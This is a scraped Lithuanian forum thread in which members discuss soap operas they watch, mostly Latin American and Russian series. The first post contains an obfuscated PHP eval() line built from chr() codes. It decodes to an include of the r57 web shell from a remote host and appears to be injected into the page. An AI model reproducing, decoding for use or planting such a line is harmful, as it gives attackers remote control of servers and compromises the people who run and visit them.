Pereiti prie turinio
uogyte

Ar žiūrite Muilo Operas?

Rekomenduojami pranešimai

Muilo operose tiktai merginu graziu buna, o visa kita gryna TV pramones tragedija... :blink:

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Ziurejau pirma muilo opera, berods vadinosi "Ir turtuoliai verkia". Buvo pirmas ir paskutinis serialas, daugiau neziuriu, nes labai daug laiko atima. Jau geriau gera filma pasiziureti.

Dovanėlė

flow9.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Paskutinis matytas muilas - "Lunos meile" ir tai ne visas. Jau nekalbant apie tai, kad is tiesu ten pavadinime nera zodzio "meile". Turejo buti "Paveldetoja Luna".

Ziureti galima tik del graziu aktoriu (kaip Aura Kristina Geitner) ir graziu drabuziu. O siaip net veidai tie patys juose maisosi. :hm:

Nesmerkiu tu, kur ziuri

audrone1.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Šiaip nelabai žiūriu muilo operas, bet šiuo metu vieną laabai žiūriu, nes baisiai pakelia nuotaiką :P

"Sos mi vida" - "Esi mano gyvenimas" su Natalia Oreiro. Super juokingas ir ne toks kaip visi :cocktail:

1.gif

1.gif

1.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Aš tai kaip ir nežiūrėjau nei vieno tai taip ir nežiūriu, bet dabar plius dar dėl laiko stokos nežiūriu.

Bet ta su Oreiro, eidama per kanalus buvau truputį pažiūrėjus nes dėl kažko užkabino ir tiek juokiausi :cocktail: nu žodžiu ką aš čia noriu pasakyt :P kad tą muilo operą tikrai žiūrėčiau :P

Dovanėlėpagalba.gifcompliment.gifmylimas%20autorius.gifcompliment.gifsportas.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Visai netiketai uzklydau i OTR kanala, o ten pradejo rodyti rusu seriala "As visada busiu tau dekinga" ir dabar negaliu praleisti ne vienos serijos, nors ir rodo vakare 21.50 val. Tikrai pavykes filmas.

Dovanėlė

flow9.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Ziuriu ir as si seriala :D :wub1: :wub1:

"Uz viska esu tau dekinga" :super: :wub1: :P

Natalija Soldatova

soldatovanat.jpg

ledi_x liko tik dvi serijos :lol:

Su makiazu visai kita mergicka atrodo :D

1144421985.jpg

DovanėlėVIP.gifmylimas%20autorius.gifzvaigzde.gifflow14.gif

Skaitome forumo taisyklės

Galima pamilti žmogaus sielą nepažinus jo kūno - Ir paskui išeiti iš proto, palietus mylimos sielos kūną

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Ziuriu ir as si seriala :D :wub1: :wub1:

"Uz viska esu tau dekinga" :super: :wub1: :P

Natalija Soldatova

soldatovanat.jpg

ledi_x liko tik dvi serijos :lol:

Su makiazu visai kita mergicka atrodo :D

1144421985.jpg

o gaila, kad jau baigiasi :(

Dovanėlė

flow9.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

ledi_x, siandien paskutines serijos :geda::hm:

Galima pamilti žmogaus sielą nepažinus jo kūno - Ir paskui išeiti iš proto, palietus mylimos sielos kūną

Dalintis šiuo pranešimu

Nuoroda į pranešimą
ledi_x, siandien paskutines serijos :geda: :lol:

Tai as ir pagalvojau :hm:, nes filmas baigesi vestuvemis....kazkaip paskutineje serijoje viskas greitai uzsibaige, net nesitikejau.

Dovanėlė

flow9.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Tai as ir pagalvojau :hm:, nes filmas baigesi vestuvemis....kazkaip paskutineje serijoje viskas greitai uzsibaige, net nesitikejau.

Na taip.... bet filmas man laaaaaaaaaaaaaaaaabai patiko :geda: :lol: :hm: :lol: :lol:

Kaip tau? :hm:

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Na taip.... bet filmas man laaaaaaaaaaaaaaaaabai patiko :super::sird::super::sird::sird:

Kaip tau? :hm:

Patiko ir man :sird: , tik sakau, kad nesitikejau tokios greitos pabaigos.

Dovanėlė

flow9.gif

Dalintis šiuo pranešimu

Nuoroda į pranešimą

Susikurkite paskyrą arba prisijunkite, jei norite komentuoti

Komentuoti gali tik registruoti nariai

Susikurkite paskyrą

Prisijunkite prie mūsų bendruomenės.

Užsiregistruoti

Prisijungti

Turite paskyrą? Prisijunkite.

Prisijunkite dabar

• Sukurti naują...

Svarbi informacija

Informuojame, kad šiame puslapyje naudojami slapukai (angl. cookies). Sutikdami, paspauskite mygtuką „Sutinku“ arba naršykite toliau. Savo duotą sutikimą bet kada galėsite atšaukti pakeisdami savo interneto naršyklės nustatymus ir ištrindami įrašytus slapukus. Susipažinkite su Privatumo politika.